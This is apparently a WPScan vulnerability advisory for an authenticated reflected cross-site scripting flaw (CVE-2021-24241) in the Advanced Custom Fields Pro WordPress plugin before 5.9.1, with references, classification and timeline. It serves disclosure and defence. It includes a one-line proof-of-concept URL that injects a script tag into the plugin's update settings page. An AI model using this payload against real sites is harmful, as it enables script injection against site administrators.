Advanced Custom Field Pro < 5.9.1 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin did not properly escape the generated update URL when outputting it in an attribute, leading to a reflected Cross-Site Scripting issue in the update settings page.

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"><script>alert('XSS')</script>

Affects Plugins

advanced-custom-fields-pro

Fixed in version 5.9.1✓

References

CVE

CVE-2021-24241

URL

https://github.com/jdordonezn/Reflected-XSS-in-WordPress-for-ACF-PRO-before-5.9.1-plugin/issues/1

URL

https://www.advancedcustomfields.com/blog/acf-5-9-1-release/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Juan David Ordoñez Noriega

Submitter

Juan David Ordoñez Noriega

Verified

Yes

WPVDB ID

d1e9c995-37bd-4952-b88e-945e02e3c83f

Timeline

Publicly Published

2021-01-20 (about 4 months ago)

Added

2021-04-02 (about 2 months ago)

Last Updated

2021-06-09 (about 4 days ago)

Our Other Services

WPScan WordPress Security Plugin